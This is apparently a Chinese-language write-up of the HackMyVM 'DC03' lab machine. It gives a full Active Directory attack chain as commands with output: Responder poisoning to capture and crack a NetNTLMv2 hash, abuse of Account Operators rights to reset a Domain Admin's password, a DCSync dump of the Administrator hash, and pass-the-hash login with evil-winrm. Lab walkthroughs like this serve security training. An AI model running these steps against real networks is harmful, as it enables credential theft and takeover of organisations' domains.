22.DC03

dg-publish:
  - "true"
tags:
  - HMV
  - NTML-Relay
  - DCSync
  - AccountOperator组利用
难度: ⭐️⭐️⭐️⭐️
作者: josemlwdf
系统: Windows

1. 基本信息^toc

靶机链接：https://hackmyvm.eu/machines/machine.php?vm=DC03

作者：[josemlwdf](https://hackmyvm.eu/profile/?user=josemlwdf)

难度：⭐️⭐️⭐️⭐️

知识点：NTMLRelay、DCSync、AccountOperator组利用

2. 信息收集

端口扫描

nmap -sC -sV 192.168.56.126 -p- -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 02:01 CST
Stats: 0:01:59 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 82.35% done; ETC: 02:03 (0:00:07 remaining)
Stats: 0:02:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 82.35% done; ETC: 02:03 (0:00:08 remaining)
Nmap scan report for SOUPEDECODE.LOCAL (192.168.56.126)
Host is up (0.00020s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-20 17:17:35Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn\_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|\_http-title: Not Found
|\_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn\_http    Microsoft Windows RPC over HTTP 1.0
49689/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:9E:B3:30 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|\_    Message signing enabled and required
| smb2-time:
|   date: 2024-11-20T17:18:28
|\_  start\_date: N/A
|\_clock-skew: -45m31s
|\_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:9e:b3:30 (Oracle VirtualBox virtual NIC)

fscan -h 192.168.56.126

   \_\_\_                              \_
  / \_ \     \_\_\_  \_\_\_ \_ \_\_ \_\_ \_  \_\_\_| | \_\_
 / /\_\/\_\_\_\_/ \_\_|/ \_\_| '\_\_/ \_ |/ \_\_| |/ /
/ /\_\\\_\_\_\_\_\\_\_ \ (\_\_| | | (\_| | (\_\_|   <
\\_\_\_\_/     |\_\_\_/\\_\_\_|\_|  \\_\_,\_|\\_\_\_|\_|\\_\
                     fscan version: 1.8.4
start infoscan
192.168.56.126:88 open
192.168.56.126:445 open
192.168.56.126:139 open
192.168.56.126:135 open
[\*] alive ports len is: 4
start vulscan
[\*] NetBios 192.168.56.126  [+] DC:SOUPEDECODE\DC01
[\*] NetInfo
[\*]192.168.56.126
   [->]DC01
   [->]192.168.56.126

域名 SOUPEDECODE

配置/etc/hosts

192.168.56.126 SOUPEDECODE.LOCAL DC01.SOUPEDECODE.LOCAL

3. 获取一个可用的AD用户

3.1. SMB空会话检测

先看下存不存在SMB匿名或来宾访问

 smbmap -u anonymous -H SOUPEDECODE.LOCAL

    \_\_\_\_\_\_\_\_  \_\_\_      \_\_\_  \_\_\_\_\_\_\_   \_\_\_      \_\_\_       \_\_         \_\_\_\_\_\_\_
   /"       )|"  \    /"  ||   \_  "\ |"  \    /"  |     /""\       |   \_\_ "\
  (:   \\_\_\_/  \   \  //   |(. |\_)  :) \   \  //   |    /    \      (. |\_\_) :)
   \\_\_\_  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  \_\_\_\_/
    \_\_/  \   |: \.        |(|  \_  \  |: \.        |  //  \_\_'  \    (|  /
   /" \   :) |.  \    /:  ||: |\_)  :)|.  \    /:  | /   /  \   \  /|\_\_/ \
  (\_\_\_\_\_\_\_/  |\_\_\_|\\_\_/|\_\_\_|(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_/    \\_\_\_)(\_\_\_\_\_\_\_)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[\*] Detected 1 hosts serving SMB
[\*] Established 0 SMB session(s)

看来不存在

3.2. Kerbrute爆破

尝试利用字典通过Kerberos 身份验证枚举出域内存在的用户

kerbrute userenum -d SOUPEDECODE.LOCAL -t 100 --dc DC01.SOUPEDECODE.LOCAL /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt  -o valid\_user.txt

cat valid\_user.txt|grep @ |cut -d ' ' -f8 |cut -d '@' -f1 > kerber\_brute\_users.txt

crackmapexec smb SOUPEDECODE.LOCAL -u valid\_usernames.txt -p kerber\_brute\_users.txt --no-bruteforce  --continue-on-success

没能爆破出任何密码

3.3. NTML Relay

因为我们的eth0网卡与域控处于同一个网段，就可以使用 Responder 工具执行 LLMNR（本地链路多播名称解析）或 NBT-NS（NetBIOS 名称服务）中毒攻击

通过这种方式我们可以获取目标设备发送的 NetNTLMv2 哈希

过一会就能捕获到用户xkate578的NetNTLMv2哈希

responder -I eth0

[\*] [LLMNR]  Poisoned answer sent to fe80::1086:8b10:30e1:e48c for name FileServer
[\*] [MDNS] Poisoned answer sent to 192.168.56.126  for name FileServer.local
[\*] [MDNS] Poisoned answer sent to fe80::1086:8b10:30e1:e48c for name FileServer.local
[\*] [LLMNR]  Poisoned answer sent to fe80::1086:8b10:30e1:e48c for name FileServer
[\*] [MDNS] Poisoned answer sent to 192.168.56.126  for name FileServer.local
[\*] [LLMNR]  Poisoned answer sent to 192.168.56.126 for name FileServer
[\*] [MDNS] Poisoned answer sent to fe80::1086:8b10:30e1:e48c for name FileServer.local
[\*] [LLMNR]  Poisoned answer sent to 192.168.56.126 for name FileServer
[SMB] NTLMv2-SSP Client   : fe80::1086:8b10:30e1:e48c
[SMB] NTLMv2-SSP Username : soupedecode\xkate578
[SMB] NTLMv2-SSP Hash     : xkate578::soupedecode:d84ca885a743f75e:75ED58DEE93DAC74D07D69F87AF7CDE0:0101000000000000805CD77BC13BDB01FB4B96E42697CA710000000002000800490031003100330001001E00570049004E002D0044003000320037004A00580056004C004D004B00360004003400570049004E002D0044003000320037004A00580056004C004D004B0036002E0049003100310033002E004C004F00430041004C000300140049003100310033002E004C004F00430041004C000500140049003100310033002E004C004F00430041004C0007000800805CD77BC13BDB0106000400020000000800300030000000000000000000000000400000C3E24DD853B7CB217D974A2D7CD525FC353DB59CC32512BC98B2C70E1E620A600A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C0065005300650072007600650072000000000000000000

使用hashcat破解这个hash

hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt

成功获取到密码是jesuschrist

4. 获取到用户的后续利用

现在我们获取到了用户与密码

xkate578：jesuschrist

4.1. 获取用户的SMB共享

crackmapexec smb DC01.SOUPEDECODE.LOCAL -u 'xkate578' -p 'jesuschrist' --shares
SMB         SOUPEDECODE.LOCAL 445    DC01             [\*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         SOUPEDECODE.LOCAL 445    DC01             [+] SOUPEDECODE.LOCAL\xkate578:jesuschrist
SMB         SOUPEDECODE.LOCAL 445    DC01             [+] Enumerated shares
SMB         SOUPEDECODE.LOCAL 445    DC01             Share           Permissions     Remark
SMB         SOUPEDECODE.LOCAL 445    DC01             -----           -----------     ------
SMB         SOUPEDECODE.LOCAL 445    DC01             ADMIN$                          Remote Admin
SMB         SOUPEDECODE.LOCAL 445    DC01             C$                              Default share
SMB         SOUPEDECODE.LOCAL 445    DC01             IPC$            READ            Remote IPC
SMB         SOUPEDECODE.LOCAL 445    DC01             NETLOGON        READ            Logon server share
SMB         SOUPEDECODE.LOCAL 445    DC01             share           READ,WRITE
SMB         SOUPEDECODE.LOCAL 445    DC01             SYSVOL          READ            Logon server share

4.2. smbcilent连接smb共享

smbclient -U 'xkate578' '//SOUPEDECODE.LOCAL/share'
Password for [WORKGROUP\xkate578]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Thu Nov 21 03:29:56 2024
  ..                                  D        0  Thu Aug  1 13:38:08 2024
  desktop.ini                       AHS      282  Thu Aug  1 13:38:08 2024
  user.txt                            A       70  Thu Aug  1 13:39:25 2024

获取到我们的用户flag

┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# cat user.txt
▒▒12f54a96f64443246930da001cafda8b

4.3. bloodhood分析域环境

┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# dnschef --fakeip 192.168.56.126 &
[1] 71209

┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─#           \_                \_          \_\_
         | | version 0.4  | |        / \_|
       \_\_| |\_ \_\_  \_\_\_  \_\_\_| |\_\_   \_\_\_| |\_
      / \_ | '\_ \/ \_\_|/ \_\_| '\_ \ / \_ \  \_|
     | (\_| | | | \\_\_ \ (\_\_| | | |  \_\_/ |
      \\_\_,\_|\_| |\_|\_\_\_/\\_\_\_|\_| |\_|\\_\_\_|\_|
                   iphelix@thesprawl.org

(03:14:06) [\*] DNSChef started on interface: 127.0.0.1
(03:14:06) [\*] Using the following nameservers: 8.8.8.8
(03:14:06) [\*] Cooking all A replies to point to 192.168.56.126


┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─#

┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# bloodhound-python  -u xkate578 -p jesuschrist -ns 127.0.0.1 -d SOUPEDECODE.LOCAL  -dc DC01.SOUPEDECODE.LOCAL --zip
INFO: Compressing output into 20241121031526\_bloodhound.zip

导入压缩包里面的json文件进行分析

发现这xkate578用户是Account Operator 组的成员，但当前用户在 AD 环境中创建和修改帐户的能力有限

Account Operators（账户操作员） 组为成员赋予了有限的账户创建权限。

该组的成员可以创建和修改大多数类型的账户，包括用户账户、本地组和全局组的账户。
此外，组成员可以直接登录域控制器。Account Operators 组的成员不能管理以下内容：

Administrator（管理员）用户账户。

Administrators、Server Operators、Account Operators、Backup Operators 和 Print Operators 等默认受保护组。

Account Operators 组的成员也不能修改系统级别的用户权限（如登录本地、作为服务运行等）

看一下到域管理的最近路径

我们可以看到，用户 FBETH103 是 Operators 组的成员，而 Operators 组又是 Domain Admins（域管理员）组的成员。由于 Operators 组并不是默认受保护组，

因此 Account Operators（账户操作员）组的成员可以修改该组中成员的账户信息。

接下来，我们可以修改用户FBETH103 的密码。

4.4. 修改FBETH103用户密码

┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# impacket-changepasswd SOUPEDECODE.LOCAL/fbeth103@192.168.56.14 -altuser xkate578 -altpass jesuschrist  -newpass admin123 -reset
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[\*] Setting the password of SOUPEDECODE.LOCAL\fbeth103 as SOUPEDECODE.LOCAL\xkate578
[\*] Connecting to DCE/RPC as SOUPEDECODE.LOCAL\xkate578
[\*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.

也可以用setuserinfo2 命令

┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# rpcclient -U 'xkate578' 192.168.56.14
Password for [WORKGROUP\xkate578]:
rpcclient $> setuserinfo2 fbeth103 23 admin12345
rpcclient $> exit

┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# crackmapexec smb DC01.SOUPEDECODE.LOCAL -u 'fbeth103' -p 'admin12345'
SMB         SOUPEDECODE.LOCAL 445    DC01             [\*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         SOUPEDECODE.LOCAL 445    DC01             [+] SOUPEDECODE.LOCAL\fbeth103:admin12345 (Pwn3d!)

还可以用bloodyAD进行修改密码

┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# bloodyAD -d SOUPEDECODE.LOCAL --host 192.168.56.14 -u xkate578 -p jesuschrist set password FBETH103 admin321
[+] Password changed successfully!

4.5. DCSync

此时我们获取到了Operators 组下的用户FBETH103 ，而Operators 组又是Domain Admins（域管理员）组的成员，那么我们就可以用这个用户对域控制器执行 DCSync 攻击。

┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# crackmapexec smb DC01.SOUPEDECODE.LOCAL -u fbeth103 -p admin321 --ntds >ntds.txt

┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# cat ntds.txt|grep Administrator
SMB         SOUPEDECODE.LOCAL 445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:2176416a80e4f62804f101d3a55d6c93:::

利用Administrator用户的NTLM hash 密码登录

┌──(root㉿kali)-[/home/kali/hmv/DC03]
└─# evil-winrm -i 192.168.56.14 -u Administrator -H 2176416a80e4f62804f101d3a55d6c93

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting\_detection\_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
\*Evil-WinRM\* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
b8e59a7d4020792c412da75e589ff4fc